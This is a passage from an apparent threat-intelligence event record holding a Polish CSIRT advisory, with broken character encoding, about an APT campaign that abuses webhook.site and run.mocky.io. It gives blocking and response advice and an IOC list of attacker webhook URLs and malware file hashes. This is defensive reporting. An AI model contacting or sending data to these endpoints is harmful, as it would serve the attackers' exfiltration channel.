otrzymywanych wiadomo\u00c5\u009bciach email. Podkre\u00c5\u009blamy jednocze\u00c5\u009bnie, \u00c5\u00bce s\u00c4 to serwisy powszechnie wykorzystywane przez programist\u00c3\u00b3w i ruch do nich nie musi oznacza\u00c4\u0087 infekcji. \r\n * Je\u00c5\u009bli organizacja nie korzysta z wymienionych serwis\u00c3\u00b3w zalecamy rozwa\u00c5\u00bcenie blokady wy\u00c5\u00bcej wymienionych domen na urz\u00c4 dzeniach brzegowych. \r\n * Niezale\u00c5\u00bcnie od tego, czy korzystaj\u00c4 Pa\u00c5\u0084stwo z ww. serwis\u00c3\u00b3w, zalecamy r\u00c3\u00b3wnie\u00c5\u00bc filtrowanie maili pod k\u00c4 tem link\u00c3\u00b3w w domenach webhook.site oraz run.mocky.io, poniewa\u00c5\u00bc przypadki ich prawid\u00c5\u0082owego u\u00c5\u00bcycia w tre\u00c5\u009bci e-maila s\u00c4 bardzo rzadkie. \r\n \r\n Serwisy tego typu by\u00c5\u0082y ju\u00c5\u00bc wielokrotnie wykorzystywane w kampaniach zwi\u00c4 zanych z grupami APT. \r\n\r\n Je\u00c5\u009bli istnieje podejrzenie infekcji szkodliwym oprogramowaniem, rekomendujemy od\u00c5\u0082\u00c4 czenie urz\u00c4 dzenia od sieci (zar\u00c3\u00b3wno przewodowej jak i bezprzewododowej) oraz niezw\u00c5\u0082oczny kontakt z w\u00c5\u0082a\u00c5\u009bciwym zespo\u00c5\u0082em CSIRT. \r\n\r\n \r\n * CSIRT GOV \u00e2\u0080\u0093 centralna administracja rz\u00c4 dowa i infrastruktura krytyczna,\r\n * CSIRT MON \u00e2\u0080\u0093 instytucje wojskowe,\r\n * CSIRT NASK \u00e2\u0080\u0093 wszystkie pozosta\u00c5\u0082e.\r\n \r\n ## IOC\r\n\r\n URLe:\r\n\r\n https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885 https://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885 https://webhook.site/4ba464d9-0675-4a7a-9966-8f84e93290ba https://webhook.site/577b82c3-7249-44e9-9353-5eab106fead6 https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=127df518-52be-46c5-bbb2-0479f4b9693b https://webhook.site/127df518-52be-46c5-bbb2-0479f4b9693b https://webhook.site/0ef0dcf7-f258-4d02-b274-cbf62a2000cf https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=c1112bb3-0e6e-4ba4-abe7-fb31388b47ad https://webhook.site/c1112bb3-0e6e-4ba4-abe7-fb31388b47ad https://webhook.site/3f396db1-2016-4b69-9ec3-ffc417d5f3aa https://webhook.site/66ea3bbc-29dc-4ece-b804-71c6ec7b77b6 https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=efb79108-a2b5-4cba-844d-6352bb8fad8c https://webhook.site/efb79108-a2b5-4cba-844d-6352bb8fad8c https://webhook.site/9c87649c-220d-425d-8331-ffc8d9b94a38 https://webhook.site/c618ea32-2923-4c12-8151-8d0002b56af0 https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=f97bcee0-0d91-4503-a30c-027f1b34820f https://webhook.site/f97bcee0-0d91-4503-a30c-027f1b34820f https://webhook.site/9a9cdaf8-120c-4de9-b17a-d6d8e2796a3b https://webhook.site/e13d23aa-b6f8-4491-9adc-71f7f8c438df https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5e4c7949-30a2-4477-9e9b-e8828fc76a1b https://webhook.site/5e4c7949-30a2-4477-9e9b-e8828fc76a1b https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5100fcc0-f6be-4b09-8c58-5a8a6706ec4f https://webhook.site/5100fcc0-f6be-4b09-8c58-5a8a6706ec4f https://webhook.site/7674f06b-e435-4470-a594-6d59578c552d https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4 https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=508da0df-7ec9-420e-b1fe-958fbbe699d1 https://webhook.site/508da0df-7ec9-420e-b1fe-958fbbe699d1 https://webhook.site/bec23763-b8d9-4191-99ba-04a4a163b4de https://webhook.site/90fea98f-fbdb-4847-be03-409d02a43caf https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=bc349b93-b047-42f8-a421-d45e3ec94dc5 https://webhook.site/bc349b93-b047-42f8-a421-d45e3ec94dc5 https://webhook.site/5a8758c6-5702-4fea-9d5e-4fbdb6dd795f https://webhook.site/b10bd697-1a9f-4ec7-aa2f-1fa84ad916a1 https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=1658772a-4de8-4368-a604-980c90b0a1ed https://webhook.site/1658772a-4de8-4368-a604-980c90b0a1ed https://webhook.site/4fe5885c-f2f6-4905-8bc7-aef1a046a134 https://webhook.site/0d2dc90e-2d5e-49f8-8249-d7ab955c387a Hashe SHA256 i nazwy plik\u00c3\u00b3w:\r\n\r\n 2bd9591bea6b1f4128e4819e3888b45b193d5a2722672b839ad7ae120bf9af3d IMG-1030873974629655576.zip 52b8bfbd9ef8ecfd54e71c74a7131cb7b3cc61ea01bc6ce17cbe7aef14acc948 WindowsCodecs.dll 4001498463dc8f8010ef1cc803b67ac434ff26d67d132933a187697aa2e88ef1 bcpcn.bat 158d49cce44968ddd028b1ef5ebc2a5183a31f05707f9dc699f0c47741be84db IMG-1030873974629655576.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 kpqsklcrdsonoknaote.css 7c6689f591ce2ccd6713df62d5135820f94bdbf2e035ab70e6b3c6746865a898 IMG-7214532.zip c968f9dd1f16a435901d2b93a028a0ae2508e943c8f480935a529826deb3dbeb WindowsCodecs.dll 34cabc0ff2f216830ffe217e8f8d0fa4b7d3a167576745aba48b7e62f546207b zdesdyf.bat e1069c8677d64226f7881e8504ed7a13f79f43f143842ea6c1c8b2cc680ed6c2 IMG-238279780.zip 43ff178e428373512b83f85db32f364fc19c9a4ac7317835bd5089915b8727b5 WindowsCodecs.dll ca700d44db08ad2ebd52278a3b303f8c13e44847a507fb317ea5dfb6cc924a76 hjpxswjdkayzwfphx.bat bab7e81395e1e9ee1680c3bb702c44b1b13ee5e67fa893d765284ae168de8369 IMG-238279780.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 vngradn.css 38ae06833528db02cb3a315d96ad2a664b732b5620675028a8c5e059e820514f IMG-810629002957075004.zip ee433ddd5988ab7325b92378c6d3cb736ddb7f1bad75b939e8c931f417660129 WindowsCodecs.dll 9ddf5561562a62961a6fcac1dc49633cb79f5d3c8cc9b95fd9f87e7be70d2d35 yvrlqpkgngppjp.bat dfd1f3229f903887f2474f361a26273dc63a6221883e86c5eea2dec9521dc081 IMG-810629002957075004.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 ovhupm.css 949b0bd52a4ed47bc4a342e5a29bff2bcdb0169d2fbf0f052509b65229e19b6e IMG-368912.zip 642315d3091a3dfba6c0ed06f119fc40d21f3d84574b53e045baf8910e1fb38c WindowsCodecs.dll fb42a4e0f2dd293fd6e7acb8d67d67698a0ae7685bc5462685acf4c2f73d0b44 udkozfnsljmbpjs.bat 07e539373177801e3fc5427bf691c0315a23b527d39e756daad6a9fc48e846bc IMG-368912.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 wrkybdizscvb.css 5d2675572e092ba9aece8c8d0b9404b3adbd27db1312cd659ba561b86301fe73 IMG-451458326.zip f348a0349fdec136c3ac9eaee9b8761da6bd33df82056e4dd792192731675b00 WindowsCodecs.dll 351f10d7df282afed4558d765aa5018af0711fa4f37fa7eb82716313f4848a2f illgvjrfyevoqxk.bat 85f10d3df079b4db3a83ae3c4620c58a8362df2be449f8ce830d087ab41c7a52 IMG-451458326.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 mzmtfylpywlyurkcd.css 745cfce3e0242d0d5f6765b1f74608e9086d7793b45dbd1747f2d2778dec6587 IMG-0601181.zip 598a8b918d0d2908a756475aee1e9ffaa57b110d8519014a075668b8b1182990 WindowsCodecs.dll ef67f20ff9184cab46408b27eaf12a5941c9f130be49f1c6ac421b546dac2bac hzjtajjklr.bat 96766dfbf6c661ee3e9f750696803824a04e58402c66f208835a7acebfab1cfc IMG-0601181.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 daukbpnawvkfcjcfzu.css 4f0f9a2076b0fd14124bed08f5fc939bada528e7a8163912a4ad1ec7687029a3 IMG-89848928.zip ae4e94c5027998f4ce17343e50b935f448e099a89266f9564bd53a069da2ca9a WindowsCodecs.dll d714fff643d53fdd56cf9dcb3bd265e1920c4b5f34a4668b584a0619703d8a3e jxfgibtfxiewsdvmeg.bat b3e60909036c4110eb7e3d8c0b1db5be5c164fcc32056885e4f1afe561341afd IMG-89848928.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 cvywrkrhhfzza.css 5883842c87ca6b59236257e15db983cc88d4948cf0d649455f8f393899673fcc IMG-3907894910429.zip 0873a19d278a7a8e8cff2dc2e7edbfddc650d8ea961162a6eb3cb3ea14665983 WindowsCodecs.dll e826dc4f5c16a1802517881f32f26061a4cbc508c3f7944540a209217078aa11 bmpxjphdzwommblflx.bat 750948489ed5b92750dc254c47b02eb595c6ffcefded6f9d14c3482a96a6e793 IMG-3907894910429.jpg 939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 qseybqanfkus.css Udost\u00c4\u0099pnij:", "id": "620", "event_id": "220651", "timestamp": "1715185395", "uuid": "2d5b8eaf-a5c9-49e3-92be-aed19adeddb4", "deleted": false } ] } }